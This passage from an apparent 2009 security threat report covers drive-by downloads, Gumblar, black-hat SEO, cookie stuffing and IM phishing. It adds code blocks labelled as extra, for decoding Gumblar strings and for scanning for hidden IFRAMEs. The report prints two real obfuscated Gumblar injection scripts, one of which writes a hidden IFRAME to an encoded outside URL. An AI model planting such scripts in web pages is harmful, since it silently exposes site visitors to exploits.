attempting to visit malicious content hosted on a website.

4.6.4. From Stepping Stones to Drive-By Attacks


In 2008, Symantec12 tracked over 18 million drive-by download infection attempts; between
August and October 2009 alone, this number already reached 17.4 million.
When a victim downloads malware directly from a compromised, legitimate website, the
victim may be automatically led through a complex system of invisible redirects to the
endpoint where the new malware is hosted. In addition, often many new websites are
brought online over time to act as “stepping-stones” between the compromised websites
and the endpoints where the malware is located.

12 http://www.symantec.com/connect/blogs/breadth-security-issues-2009-stunning


Figure 40: Lifecycle of malicious websites over time (diagram: users click on a link which
redirects, through proxy sites used to redirect, to the website hosting new malware; over time
more proxy sites are added to replace old ones)


When a new strain of malware is created, it is initially hosted on a small number of websites,
with hyperlinks to it added from other malicious websites and emails. Over time, more malicious
websites are used, often combined with simple redirects using JavaScript or HTTP 302
redirect responses to divert the visitor seamlessly to another website, or to the malware itself.
Often several redirections may be used, as one website bounces the user to another before
the malware is reached. This process would be invisible to the user, perhaps only noticeable
as the page may take longer to load. The use of these “disposable” proxies helps to ensure
that the websites hosting the malware remain obscured for as long as possible.
For example, of 100 domains blocked each day in 2009:
• 36 of them had not been blocked previously, of which:
  • 30 (84.5%) were older, compromised legitimate domains;
  • 6 (15.5%) were newer, recently registered domains;
• 64 were domains (legitimate or otherwise) that had been blocked previously and were
already known for harboring malware.
4.6.5. Malware More Likely to be Found on Compromised Websites
The traditional school of thought suggested that most web-based malware resides on less
reputable websites often touting adult-themed content, but this premise was called into
question when MessageLabs Intelligence identified that cybercriminals were more likely
to hide malicious content on older, more reputable domains; domains that were legitimate
and well-established, but had been compromised. Some of these domains were also
associated with social networking environments and Web 2.0 websites, providing mainly
user-generated content.
MessageLabs Intelligence data in 2009 revealed that:
• 84.6% of website domains blocked for hosting malicious content are well-established
domains that are over a year old;
• 15.4% of domains blocked are domains that are less than a year old;
• 10.2% are domains that are less than a month old;
• and 3.1% are domains that are less than a week old.
These older domains were more likely to be well-established and therefore more reputable,
and the likelihood that they were legitimate sites that had been compromised in some way
was increased. Malicious domains that were only a week old or less were more likely to be
temporary sites set up with the sole purpose of distributing malware or spam, and were
typical of many domains established solely to distribute rogue anti-spyware or anti-malware
products.
Very new sites are also often used by website affiliates, in order to redirect visitors to
another site. This helps to ensure that they receive payment for any click-through revenue
that their sites generate, but sometimes they will also include drive-by attacks, often using
hidden HTML IFRAME exploits.
Once a domain like this has been used to serve malware to unsuspecting visitors, it is
usually not too long before the domain is recognized by the security community and may
appear in a block-list. Once blocked, steps are then taken to issue a notice and takedown
to the registrar or hosting provider to remove it as a threat from the Internet. However, in
the case of compromised legitimate websites, the legitimate owners should be notified that
their websites have been compromised and be given the opportunity to take appropriate
action to clean up their websites, removing the malware and closing any vulnerability that
was exploited to gain access.
4.6.6. The Importance of Age: Are Older Domains More Difficult to Clean?
How long, on average, does it take for a malicious website to be noticed, removed or
rendered harmless again? The vast majority (over 90%) of domains blocked by the MessageLabs
Hosted Web Security Service (WSS), were taken down or cleaned up within 120
days, or four months. One-third of malicious websites were taken down or cleaned within
seven days and 13% of websites were taken down or cleaned within one day, as seen in
figure 41.
The typical profile of websites that were compromised and being used to serve malware
indicated that they had been registered for more than three months before first being
blocked as hosting malicious content. These may be termed “older” domains. The research
indicated that these domains, when used to host malicious content, actually survived for
a longer period of time than their younger counterparts and would take a relatively long
time to be cleaned. Only 8% of legitimate or older websites were cleaned within one day;
11% within two days; and 21% within one week. Furthermore, 90% of older domains were
cleaned up within 138 days, a very long time when compared with the clean-up rate for
“young” domains.

                                              ALL DOMAINS   YOUNG DOMAINS   OLDER DOMAINS
Taken down or cleaned within 1 day of
being first blocked as malicious                  13%            29%              8%
Within 2 days                                     18%            40%             11%
Within 7 days                                     32%            65%             21%
Within 25 days                                    50%
Within 30 days                                    54%            87%             43%
90% are cleaned within                        120 days        38 days        134 days
Take more than 1 day                              87%            71%             92%
Take more than 7 days                             68%            35%             79%
Take more than 2 weeks                            58%            24%             70%

Figure 41: Clean-up rates for website domains linked to malware


Websites established with the intent to serve malware were often reached through redirection
scripts and links from other legitimate websites, such as links posted on social networking
websites, malicious or compromised banner advertising, hyperlinks posted in spam
emails and hyperlinks shared over instant messaging traffic.
The typical profile of these websites indicated that they had been registered up to three
months before first being blocked for hosting malicious content. These may be called
“young” domains. There are only a small number of newly registered legitimate websites
that fall into this category and have become compromised, but the vast majority are young
websites blocked as malicious and founded with malicious intent.
The wider Internet community and Internet security companies are often much more aware
of these newly-registered domains harboring malicious content and a relatively large proportion
of them (approximately 29%) are taken down after just one day; 40% are removed
within two days; and 65% within one week. Generally, 90% of “young” malicious domains
are taken down within 38 days.

Figure 42: Chart showing clean-up lifecycle for website domains linked to malware (x-axis:
days since first block, 0 to 180; y-axis 0% to 100%; series: “Old” domains and “New” domains;
annotation: over time more than 80% of malicious domains are “Old” domains)
Perhaps it is not surprising that with such a small window of opportunity, the bad guys
continue to register many new domains as often as possible. Once activated and serving
malware, it was then only a matter of time before each domain would be taken offline or
cleaned.
4.6.7. The End of “Domain Tasting” and “Domain Kiting” in 2009
It often seemed to take much longer for compromised legitimate websites to be cleaned as
taking down a malicious (“young”) domain would be relatively easy. Finding the malicious
parts of a sometimes large and complex, legitimate and often “older” website, and then
repairing it without causing damage to the operation of the website, is much harder.
Once the compromise has been identified, steps are needed to secure the site against
further attack. Most companies, especially large ones, may have to go through several
stages internally to achieve this. In some cases, the threat may be so deeply knotted within
the structure of the website that it may take website administrators a much longer time to
identify a mitigation strategy and implement it.
With approximately 80% of domains blocked as malicious being legitimate websites, it
is clear to see why attackers preferred to compromise legitimate websites, rather than to
create and register newer, specialized domains to serve the malware. Fundamentally, using
legitimate websites to spread malware potentially extends the lifetime of the malware. In
other words, it seems to take much longer to make these types of websites safe again.
There is also another factor to consider: For a long time, spammers, scammers and malware
distributors have been able to take advantage of a time limit policy called “Add Grace
Period” which allows them to register and then delete a domain at no cost, as long as the
cancellation was within the first five days. This practice is known as “domain tasting.”
Repeated use of “domain tasting” is called “domain kiting,” where domains potentially
remain registered for considerably longer periods without ever being paid for.
In order to combat “domain tasting” and “domain kiting,” in June 2008, ICANN (Internet
Corporation for Assigned Names and Numbers) implemented a couple of measures to
address the problem and would only allow domain registrars to de-register up to 10% of
their total registrations and be fully credited with their costs, but an excessively higher
number of cancellations would result in a penalty being imposed. This meant that U.S. $0.20
would be levied for each domain cancellation over and above the 10% limit, increasing
this penalty to U.S. $6.75 as of July 2009. And in August 2009, ICANN reported a 99.7%
decrease in such deletions between June 2008 and April 2009. Perhaps this finding reflects
the trend described above and goes some way to explaining why malicious domains in 2009
were likely to be older, compromised websites rather than newly registered domains with a
shorter lifespan, as they had been one year previously.
4.6.8. The Rise of Drive-By Malware
The Internet has provided a rich breeding ground for the spread of malware through
drive-by attacks on compromised websites and through fake profiles and phished accounts
on social networking websites. MessageLabs Intelligence analyzed the domains that were
being used to host the majority of malicious content blocked in 2009 and determined how
much of a factor the age of a domain is in potentially determining the nature of malicious
websites. Malicious domains are domains that were established with the pure intention to
serve malware, or sometimes, legitimate websites that have been compromised in some way
for use as a platform from which the cybercriminals serve their malware. A typical example
of this was found in the spread of the Gumblar malware.

Figure 43: Typical profile of a drive-by website attack (diagram: 1. hacker inserts a malicious
URL into a good web site; 2. user visits the good web site; 3. user is redirected to the bad
site; 4. bad site sends an obfuscated exploit for a vulnerability on the end user’s system;
5. malware is installed without the user noticing; 6. malware sends private data to the hacker)


When the Gumblar malware was discovered in March 2009, it received instructions from
a server at gumblar.cn. That domain was taken offline, but in November it had seemingly
returned. In figure 44, it can be seen that the malware made an unwelcome return in
October and November 2009.
In October 2009, Gumblar malware accounted for less than 1% of all malicious web activity
blocked, but in November 2009 this figure rose to more than 20% of all malicious web
activity blocked.
In November 2009, 641 different domains were blocked owing to Gumblar infections, but
only 15% of those were registered during 2009. This strongly suggests that the attackers
had been seeking mostly to infect legitimate websites in order for it to spread.
Figure 44: % of WSS traffic blocked linked to Gumblar in 2009 (chart: 20 Feb to 13 Nov 2009,
y-axis 0% to 60%, series gumblar.cn)


On one example website, the item blocked as Gumblar was in a file named sponsor.php,
which contained the following obfuscated script:
// 404 <script>
pXads=24;if(prompt)pXads='';W4oYE=unescape('%'+pXads);
bFr='';
eval(unescape(bFr.replace(/[sPARm]/g,W4oYE)));
//</script>

In another example, htaccess.php, the following highly obfuscated script could be found:


<!-- mxiT sdfsd fFDSGHHFLJ QpoeMFcBE Jsdf2 34sdKJSGHD --><script>/*_ETDUgjXHHsPRwB*/var
UoaYW=document;/*ZhrKKeLMtGo*/function ixekV_(IPqcMJ)/*GGrIVvncvNlccEcKblPy*/{var ROVBw =
"",/*cDvbb XrTU YAxVWlCtKRA*/FchmZybuaK=0;for(FchmZybuaK=IPqcMJ.length-1;FchmZybuaK >=
0;FchmZybuaK--)/*GGrIVvncvNlccEcKblPy*/{ROVBw+=IPqcMJ.charAt(FchmZybuaK);}return ROVBw;/*TmU
ExYK OCEcYaUs hnzPxfOA*/}/*SMXIq vqPtz tkhbKj VmKPR*/function
LgDLGtpg(vfpejwlolC)/*VkhfuYaKSyC*/{/*SMXIqvqPtztkhbKjVmKPR*/vfpejwlolC =
vfpejwlolC.replace(/[\.]/g, "%");/*TmUEx YKOCEc
aUshnzPxfOA*/vfpejwlolC=unescape(vfpejwlolC);/*pR_jrUloIVVsbiJzei*/return
ixekV_(vfpejwlolC);/*ZhrKKeLMtGo*/}/*KAXQTqUZeuhOrfGM_B*/function MnE_vpOF(){/*BSDNf yxyq
FdEnFRrXt_q*/UoaYW.write("<style>.ziKoRZhTA{width:1px;height:1px;border:none;visibility:hidden
}</style>");/*OEcWuzvdnSifFzrbTzBGVLsl*//*kIKhEhiXzphvzl*/var
dmiaXgrp="";/*kIKhEhiXzphvzl*//*OOBbwTKCJmtmNLwMzIVSpZ*/var
PqSiNZf=dmiaXgrp.replace(/[\+x]/g,LgDLGtpg(".70.68.70.2e.6e.69.2f.73.72.65.73.75.2f.6f.66.6e.6
9.2e.73.63.69.74.79.6c.61.6e.61.2d.73.74.61.74.73.2f.2f.3a.70.74.74.68"));/*BPRQiOgwzAY_fBHF*/
/*VkhfuYaKSyC*/return
PqSiNZf;/*cDvbbXrTUYAxVWlCtKRA*//*mNtGiUcPmHJEcBDVhzkp*/}/*lqNbuXUvhsx*//*NipwgVkhKkGaiMpIelzQ
zfqg*//*JzrbYbIRwneHlb*//*cDvbbXrTUYAxVWlCtKRA*/UoaYW.writeln(MnE_vpOF());/*Nipwg VkhKk
GaiMpIelzQzfqg*//*mN tGiUc PmHJEcBDVhzkp*//*OOBbw TKCJmtm NLwMz IVSpZ*/</script><!--
mxiTQpoeMFcBEJ-->

A Gumblar-infected website typically contains a hidden IFRAME tag, an often-used tactic to
serve up malicious scripts from other websites. Upon visiting such a site, the hidden IFRAME
will include malicious scripts that seek to exploit certain vulnerabilities on the user’s
computer; for example, targeting un-patched versions of a popular .PDF viewer can result in a
drive-by attack.
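As an added analyst-side example (not code from the report), the following JavaScript re-implements the decoding steps of the two Gumblar scripts quoted above with readable names, so the URL hidden in htaccess.php can be recovered without executing the original code; the letter-masked sample payload is constructed here, because the report does not reproduce the real one.

```javascript
// Added analyst-side example, not code from the report: the two decoding routines
// from the Gumblar scripts above, re-implemented with readable names so the hidden
// URL can be recovered without executing the original obfuscated code.

// htaccess.php: LgDLGtpg() rewrites ".70.68..." as "%70%68...", percent-decodes it,
// and ixekV_() then reverses the result character by character.
function decodeDottedReversedHex(dotted) {
  const percentEncoded = dotted.replace(/[.]/g, '%');
  const decoded = unescape(percentEncoded); // same legacy call the script relies on
  return decoded.split('').reverse().join('');
}

// The dotted string exactly as quoted in htaccess.php above (PDF line wrap removed).
const GUMBLAR_DOTTED =
  '.70.68.70.2e.6e.69.2f.73.72.65.73.75.2f.6f.66.6e.69' +
  '.2e.73.63.69.74.79.6c.61.6e.61.2d.73.74.61.74.73.2f.2f.3a.70.74.74.68';

// sponsor.php: the letters s, P, A, R and m stand in for '%' in the payload. The
// marker only becomes '%' when window.prompt exists; where it does not (a non-browser
// analysis tool), the script computes unescape('%24') = '$' and the payload decodes
// to garbage. That is an environment check aimed at automated analysis, not randomness.
function gumblarMarkerChar(hasPrompt) {
  const pXads = hasPrompt ? '' : 24;
  return unescape('%' + pXads);
}

function decodeLetterMaskedPayload(masked, marker) {
  return unescape(masked.replace(/[sPARm]/g, marker));
}

// Constructed sample in the same scheme (the report does not reproduce the real bFr
// payload): "var x=1;" percent-encoded byte by byte, with marker letters for '%'.
const SAMPLE_MASKED = 's76P61A72R20m78s3dP31A3b';

// Runs both decoders and returns the results for inspection.
function analyseGumblarSamples() {
  return {
    hiddenUrl: decodeDottedReversedHex(GUMBLAR_DOTTED),
    browserMarker: gumblarMarkerChar(true),
    sandboxMarker: gumblarMarkerChar(false),
    sampleInBrowser: decodeLetterMaskedPayload(SAMPLE_MASKED, gumblarMarkerChar(true)),
    sampleInSandbox: decodeLetterMaskedPayload(SAMPLE_MASKED, gumblarMarkerChar(false)),
  };
}

console.log(analyseGumblarSamples());
```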
4.6.9. Black Hat SEO: Increasing Traffic to Compromised Websites
Once hackers take control of compromised websites, they can fool innocent visitors in many
different ways. The black hat (BH) search engine optimization (SEO) techniques are becoming
increasingly popular to indirectly target more victims through polluting search engine
result pages (SERPs). This is particularly useful from the bad guys’ perspective: as they track
the popular search terms relating to news and current events, they will seek to reference
these popular terms in the BHSEO techniques in order to increase the search engine rankings
for their malicious content.
Compromised websites are frequently configured in order to present different content to the
search engines which crawl the websites from that which is presented to real visitors, who
visit the site by following links in SERPs.
Once the website has identified that a visitor is not a search engine crawler, but a real visitor,
it would simply redirect them to another website that would be hosting the malware.
Often the owners of a compromised website may be unaware that the BHSEO process relies
on unscrupulous techniques such as link-farming, “doorway” pages and cloaking. These approaches
are very much frowned upon by the search engine providers and once discovered
the website will be penalized in terms of the rankings on those search engines – this may
even result in all references to the legitimate content on the compromised website being
revoked – potentially disastrous for any legitimate business.
4.6.10. Beyond Black Hat SEO: Black Hat Affiliate Marketing
Bad guys can benefit from the hijacked traffic from search engine searches in many
different ways. Apart from the example above to install fake antivirus software or some
other Trojan horse download, another good example of benefiting from Black Hat Search
Engine Optimization (BHSEO) is the Black Hat Affiliate Marketing (BHAM). Similar to BHSEO,
Black Hat Affiliate Marketing does questionable things to make money by injecting affiliate
information into a user’s computer. Typically, normal affiliate marketing works as follows:
1. A visitor views an affiliate webpage or link;
2. The visitor clicks on an affiliate link;
3. The visitor makes a purchase from the affiliate associated merchant within a specific
period since last click.
Using BHAM, affiliates seek to bypass the first two steps by simulating clicks on affiliate
links to automatically place affiliate cookies to the user’s computer. This is called “cookie
stuffing”. As long as the user makes a purchase from any of the affiliate associated
merchants during the valid period of a cookie, the affiliate will get commission from the
merchant. A cookie normally has a given valid period, for example, 30 days. To reward the
affiliate, a customer must make a purchase from the corresponding merchant during that
period when the cookie is still valid.


To apply cookie stuffing techniques, affiliates often create tiny or zero-size HTML IFRAME
tags containing the affiliate links and insert them into compromised web pages
or ad banners. In figure 45, three invisible IFRAMEs are appended to a normal ad banner.
In this case, when the ad banner is loaded, it will load the invisible IFRAMEs and place the
affiliate cookies into the users’ computer without them realizing. This technique is used to
bypass steps 1 and 2 above, in order to simulate a real user clicking on affiliate links.

Figure 45: Zero-size hidden IFRAMES containing affiliate links

4.6.11. Hidden Scripts, Fraudulent Click-Thru’s and Cookie Stuffing


It is not surprising that affiliates can combine both BHSEO and BHAM techniques to drive
more traffic to their affiliate links for money making. For example, the number of malicious
websites blocked in March 2009 rose by almost 200%, to its highest level since October
2008. Behind this sharp increase was a number of files being blocked, such as .PDFs and
images including .JPGs and .GIFs that had been injected with hidden JavaScript.
The hidden code was seemingly designed to serve-up pop-up online ads in order to generate
click-thru revenue and had been used in conjunction with a number of free online tracking
tools, where tracker codes are legitimately used to monitor visitors to particular websites.
Many of these files and images were present in spam emails that had been blocked as
potentially harmful, because of the presence of the hidden scripts, such as in figure 46,
which shows an email that contained an image with hidden JavaScript found in the image
file itself.

Figure 46: Example of email with .GIF image that contained hidden JavaScript (figure labels:
GIF, CODE, Exploit)
Many similar hidden scripts were also found in other files and attachments as well, including
.PDFs and .PPTs hosted on a number of websites, and were indicative that perhaps these
websites had been compromised. In many cases, the hidden JavaScripts were routinely
appended to all files on the compromised site – not only the HTML files. The only way to
detect the presence of such scripts is by analyzing the content, as the file formats were not
corrupted in the process, so the images were still viewable.
Click-thru’s are favored by affiliate referral schemes, and are frequently used as marketing
tools by vendors to increase the number of visitors and potential sales to a website. Often
an affiliate is paid on the basis of how many click-thru’s are generated by visitors
from their websites and then a percentage of any subsequent sales made by anyone they
refer to the website within a certain time period. However, many such schemes are prone
to abuse by unscrupulous affiliates, such as in the previous example where compromised
websites were being used and hidden scripts were injected into existing web content.
These cookie stuffing techniques are a way of tricking vendors’ tracking systems into
accepting that an affiliate has referred someone to their websites, when in fact they have
not – often they have only visited a website under the control of the fraudulent affiliate, but
the affiliate then uses deceptive techniques to force the visitor into receiving a cookie for
the vendors website, using the affiliate’s unique ID code.
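As an added example (not the report’s own tooling), here is a small Node.js content scanner for the two tricks described in sections 4.6.10 and 4.6.11: zero-size or hidden IFRAMEs used for cookie stuffing, and JavaScript appended to image files. The banner HTML and GIF bytes are constructed samples, and the affiliate and tracker URLs in them are placeholders.

```javascript
// Added example, not the report's own tooling: a small Node.js content scanner for two
// of the tricks described above, tiny or hidden IFRAMEs used for cookie stuffing and
// JavaScript appended to image files. It is regex based so it runs without a DOM
// library; a production scanner would use a real HTML parser.

// Returns the value of a named attribute inside an IFRAME tag's attribute string, or null.
function attr(attrs, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]*)', 'i');
  const r = re.exec(attrs);
  return r ? r[1] : null;
}

// A width/height of 0 or 1 pixel is the classic "invisible" frame size.
function isTiny(value) {
  if (value === null) return false;
  const n = parseInt(value, 10);
  return !Number.isNaN(n) && n <= 1;
}

// True when a CSS declaration list hides the element or shrinks it to 0/1 px.
function looksInvisible(css) {
  const c = css.toLowerCase();
  const tinyDim = /(width|height)\s*:\s*[01](px)?\b/.test(c);
  return /visibility\s*:\s*hidden/.test(c) || /display\s*:\s*none/.test(c) || tinyDim;
}

// Flags IFRAMEs that are tiny, hidden inline, or hidden via a class whose <style> rule
// makes it invisible (the .ziKoRZhTA trick in the Gumblar sample quoted earlier).
function findHiddenIframes(html) {
  const hiddenClasses = new Set();
  const ruleRe = /\.([\w-]+)\s*\{([^}]*)\}/g;
  let m;
  while ((m = ruleRe.exec(html)) !== null) {
    if (looksInvisible(m[2])) hiddenClasses.add(m[1]);
  }
  const findings = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = m[1];
    const reasons = [];
    if (isTiny(attr(attrs, 'width')) || isTiny(attr(attrs, 'height'))) {
      reasons.push('zero-or-one-pixel size');
    }
    if (looksInvisible(attr(attrs, 'style') || '')) reasons.push('hidden inline style');
    const cls = attr(attrs, 'class');
    if (cls && hiddenClasses.has(cls)) reasons.push('hidden css class');
    if (reasons.length > 0) findings.push({ src: attr(attrs, 'src'), reasons });
  }
  return findings;
}

// Images and PDFs never legitimately carry a <script> tag, so one appearing after the
// file header is the kind of injected JavaScript the report found in .GIF and .PDF files.
function findTrailingScript(bytes) {
  const text = Buffer.from(bytes).toString('latin1');
  const isGif = text.startsWith('GIF87a') || text.startsWith('GIF89a');
  const isJpeg = bytes[0] === 0xff && bytes[1] === 0xd8;
  const isPdf = text.startsWith('%PDF');
  const offset = text.search(/<script\b/i);
  if (!(isGif || isJpeg || isPdf) || offset < 0) return null;
  return { format: isGif ? 'gif' : isJpeg ? 'jpeg' : 'pdf', offset };
}

// Constructed sample: a banner with three invisible affiliate frames and one normal
// embedded player. The URLs are placeholders, not real domains.
const SAMPLE_BANNER_HTML = `<style>.ziKoRZhTA{width:1px;height:1px;border:none;visibility:hidden}</style>
<img src="banner.gif">
<iframe src="http://affiliate.example/ref?id=PLACEHOLDER" width="0" height="0"></iframe>
<iframe src="http://affiliate.example/ref2?id=PLACEHOLDER" style="display:none"></iframe>
<iframe class="ziKoRZhTA" src="http://tracker.example/in.php"></iframe>
<iframe src="http://video.example/player" width="640" height="360"></iframe>`;

// Constructed sample: a GIF89a signature and a 1x1 logical screen descriptor followed by
// a script tag, mimicking an image with JavaScript appended after the image data.
const SAMPLE_GIF = Buffer.concat([
  Buffer.from('GIF89a', 'latin1'),
  Buffer.from([0x01, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00]),
  Buffer.from('<script src="http://tracker.example/t.js"></script>', 'latin1'),
]);

console.log(findHiddenIframes(SAMPLE_BANNER_HTML));
console.log(findTrailingScript(SAMPLE_GIF));
```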
4.6.12. Analysis of Domain Registrar and CCTLD Locations
Although it is fairly common for some country-code top-level domains (CCTLDs) to be hosted
in other countries that are different to the CCTLD country code, it is certainly a much more
frequent occurrence for newer domains that have been established for malicious purposes.
Based on the IP address of the website for a domain, the location can be determined and for
newer malicious websites that have only been recently registered these are more likely not
to match the CCTLDs for which they are registered.
Figure 47: TLDs and CCTLDs based on the location of the websites linked to malware
(rows: country the domain is hosted in; columns: top-level domain; empty cells were dropped
when the table was extracted, so only the complete rows align with the header)

Country           .cn     .in     .ru     .us     .com    .info   .net
Canada            18.8%   61.6%   11.0%
Cayman Islands    10.1%
China             46.0%   33.3%   18.2%   3.2%    7.2%    1.2%    8.7%
Estonia           4.5%
France            4.8%
Germany           3.2%    6.4%
Hong Kong         1.0%
Ireland           17.0%
Latvia            22.7%   2.4%    1.0%
Luxembourg        2.0%    2.2%
Namibia           2.4%
Netherlands       2.9%    5.0%    2.0%
Panama            22.0%
Poland            4.8%    2.1%    3.0%
Romania           9.0%
Russia            7.1%    7.0%    40.9%   4.0%    18.0%
Serbia            10.1%
Singapore         3.0%
Taiwan            4.0%
Ukraine           23.0%   6.9%    15.0%
United Kingdom    9.1%
United States     28.0%   4.5%    93.5%   20.4%   30.0%   22.0%
For older, more well-established, legitimate websites that have been compromised, this
picture is very different and the CCTLD matches the expected location of the website much
more frequently.
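The check described above, as an added example (not MessageLabs code): it flags a ccTLD domain whose hosting country disagrees with its TLD and weights the verdict by registration age, so that a freshly registered mismatch scores highest. The ccTLD table, the IP-to-country map and the domain ages are constructed sample data; a real deployment would feed it from WHOIS and GeoIP lookups.

```python
from dataclasses import dataclass
from datetime import date

# ccTLD -> country the TLD belongs to (constructed subset for this example)
CCTLD_COUNTRY = {
    "cn": "China", "in": "India", "ru": "Russia", "us": "United States",
    "uk": "United Kingdom", "de": "Germany", "fr": "France",
}

# Stand-in for a GeoIP lookup: IP -> country the server sits in (constructed sample
# data using the documentation ranges 192.0.2/24, 198.51.100/24 and 203.0.113/24)
IP_COUNTRY = {
    "203.0.113.10": "China",
    "198.51.100.7": "United States",
    "192.0.2.44": "Canada",
}


@dataclass
class DomainObservation:
    domain: str        # hostname taken from the link in the message
    ip: str            # address the hostname resolved to
    registered: date   # creation date from WHOIS (constructed values below)


def top_level_domain(domain):
    """Return the lower-cased last label, e.g. 'cn' for 'shop.example.cn.'."""
    return domain.rstrip(".").rsplit(".", 1)[-1].lower()


def hosting_mismatch(obs):
    """True if the ccTLD's country differs from the hosting country, False if
    they agree, None when the TLD is generic or the IP cannot be geolocated."""
    expected = CCTLD_COUNTRY.get(top_level_domain(obs.domain))
    if expected is None:
        return None   # .com/.net/.info carry no location expectation
    actual = IP_COUNTRY.get(obs.ip)
    if actual is None:
        return None   # no geolocation, so no verdict
    return actual != expected


def risk_level(obs, today, new_domain_days=30):
    """Combine the mismatch with domain age, following the report's observation:
    a freshly registered ccTLD hosted elsewhere is the strongest signal, an
    established one hosted elsewhere is weaker, and agreement is unremarkable."""
    mismatch = hosting_mismatch(obs)
    if mismatch is None:
        return "unknown"
    if not mismatch:
        return "low"
    age_days = (today - obs.registered).days
    return "high" if age_days <= new_domain_days else "medium"


REFERENCE_DATE = date(2009, 11, 30)   # constructed "today" for the age calculation

# Constructed observations covering each branch of the heuristic.
SAMPLES = [
    DomainObservation("sale.example-shop.cn", "192.0.2.44", date(2009, 11, 20)),      # .cn in Canada, 10 days old
    DomainObservation("news.example-daily.cn", "192.0.2.44", date(2005, 3, 1)),       # .cn in Canada, years old
    DomainObservation("www.example-bank.cn", "203.0.113.10", date(2006, 6, 1)),       # .cn hosted in China
    DomainObservation("www.example-anything.com", "198.51.100.7", date(2009, 11, 1)), # gTLD: no expectation
]


def assess_all(samples, today=REFERENCE_DATE):
    """Map each sample domain to its risk level."""
    return {s.domain: risk_level(s, today) for s in samples}


if __name__ == "__main__":
    for domain, level in assess_all(SAMPLES).items():
        print(f"{domain:28} -> {level}")
```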
4.6.13. Happy New Malware?
Ten years ago, on 26 March 1999, the notorious Melissa virus was created and released onto
the Internet and became perhaps the very first infamous email virus. Allegedly named after
a lap dancer whom creator David L. Smith met in Florida, Melissa sent an infected email
entitled “Here is that document you asked for ... don’t show anyone else;-)” via Microsoft
Outlook to the first 50 email addresses on the victims’ mailing lists.
Within the first hour of the outbreak, MessageLabs Hosted Email AntiVirus Service intercepted
208 copies, which were very significant levels at that time. Since then, MessageLabs
Intelligence has tracked 108 different strains and more than 100,000 copies of the virus.
Melissa spread so quickly in the early stages of its outbreak that it overloaded email servers
across the globe, and despite not causing irreparable damage, the virus is widely credited
with laying the foundations for the devastating use of botnets that has since allowed cyber
criminals to spread malware so rapidly and economically. Although not on the same scale
as subsequent mass-mailing viruses such as Sobig or MyDoom, even after 10 years, Melissa
remains a feature on the threat landscape with an average of 10 copies still blocked each
month by MessageLabs Intelligence.

4.7. Instant Messaging Threats


4.7.1. Shortened URLs in IM
Shortened URLs are popular on social networking and micro-blogging websites, as mentioned
earlier, and they are also used for spamming. The use of shortened URLs in IM has been
growing since the end of 2008, although they are still relatively rare: MessageLabs
Intelligence tracked approximately 1,000 shortened URLs in over 300 million IM messages
during 2009.
On average about 0.4% or 1 in 244 IM messages contain a URL of some form. Of these, an
average of 0.09% (1 in 1,100) are shortened. The probability of encountering a malicious
shortened hyperlink shared over IM may still be very slim, but there are a few interesting
observations to be made: the websites behind these shortened URLs are often not malicious,
but are almost certainly spam related, and sometimes lead to scams.
One example of this is the Sex/Dating Mobile Phone Quiz Scam where entering means the
user will continue to be charged for several months; another example downloads an .EXE
file (which may not be malicious, but highlights the potential that these shortened URLs can
lead to downloads that may soon be malware).
4.7.2. Instant Messaging Spam Increasing in 2010
As cybercriminals exploit new ways to bypass CAPTCHA technologies, instant messenger
(IM) attacks will grow in popularity. IM threats will largely be comprised of unsolicited spam
messages containing malicious links, especially attacks aimed at compromising legitimate
IM accounts. By the end of 2010, MessageLabs Intelligence predicts that one in 300 IM mes-
sages will contain a URL. Also, in 2010, Symantec predicts that overall, one in 12 hyperlinks
will be linked to a domain known to be used for hosting malware. Thus, one in 12 hyperlinks
appearing in IM messages will contain a domain that has been considered suspicious or
malicious. In mid 2009, that level was 1 in 78 hyperlinks.

4.7.3. Instant Messenger “Friend-Phishing”


As mentioned earlier in this report, spammers have for some time now been using
CAPTCHA-bypass techniques to generate multiple user accounts on well-known IM sites and
then using these accounts to spam real people with links to spam websites and malware
sites. However, a growing trend has also emerged over recent months whereby companies
are ostensibly collecting real IM user account details and passwords and using them to send
commercial messages to their friends. The curious thing here is that the way this information
will be used is spelled out in the terms and conditions of the website.
In the example that follows, the company responsible for the domain name had also been
linked to dozens of other domains each with the same mode of operation, some of which
were first observed in March 2008. These domains have become more active in recent
months.
Further investigation suggested that the domain had ten IP addresses, and two of them
were on the same IP network, but most were located in several different countries and many
belonged to dynamic addresses, suggesting this was a botnet-hosted domain. There were
also several other domains that shared the same IP addresses and all were hosting the same
content.
The process begins when a user receives an IM from a real buddy in their contact list; this
will typically be someone they know and won’t be from a made-up IM spam account. The IM
includes some message that will entice the recipient into following the hyperlink that
follows the message. This may read something like, “phewww unbelievable, is that you???
Whoever it is… it is really similar to you lol… ” Of course the recipient may be suspicious,
but they may also be tempted to follow the link; after all, it was sent to them by a trusted
friend.
The website asks the visitor to authenticate using their own personal IM user account and
password, and at this point the details are validated such that if false credentials were
presented the login process would fail. At some point later, the same account will then be
used to send spam IM messages, such as in figure 48.


Figure 48: Example of IM from buddy with link to IM phishing website


The first indication that something is wrong is when the user is logged out of their IM
service, with a notification that they have logged in from somewhere else.
The real concern is when people share the same user account details and passwords that
they use to log into their IM client as they do for other online accounts, such as social
networking sites and those with a financial connection, including online auction sites,
payment sites and retail sites.
Finally, the “Terms & Conditions” link on the web page reveals some interesting information
about the operation and describes exactly what will happen once you hand over your IM
login account details and password, as can be seen in figure 49.
Terms of Use / Privacy Policy:

[…] By using our service/website you hereby fully authorize [redux] to send messages of a
commercial nature via Instant Messages and E-Mails on behalf of third parties via the
information you provide U.S.. This is not a "phishing" site that attempts to "trick" you into
revealing personal information. Everything we do with your information is disclosed here. If you
are under eighteen (18), you MUST obtain permission from a parent or guardian before using our
website/service.

[…] We may temporarily access your [IM] account to do a combination of the following:

1. Send Instant Messages to your friends promoting this site.
2. Introduce new entertaining sites to your friends via Instant Messages.

Figure 49: Terms of use from phishing website


Perhaps the organization responsible for this operation believes that the presence of
these legal disclaimers provides some degree of impunity by suggesting this is a perfectly
legitimate marketing approach to their targets. In any case, it probably doesn’t really matter
to the user, because research¹³ suggests that only 4% of people even read these terms in the
first place, and this tactic appears to be tantamount to a phishing expedition.

4.7.4. Instant Messaging Threats Intensifying


At the end of 2008, MessageLabs Intelligence identified that 1 in 200 (0.50%) hyperlinks
shared over public instant messaging (IM) applications were malicious, i.e. the website
domain had previously been identified as harboring some form of malware designed to perform
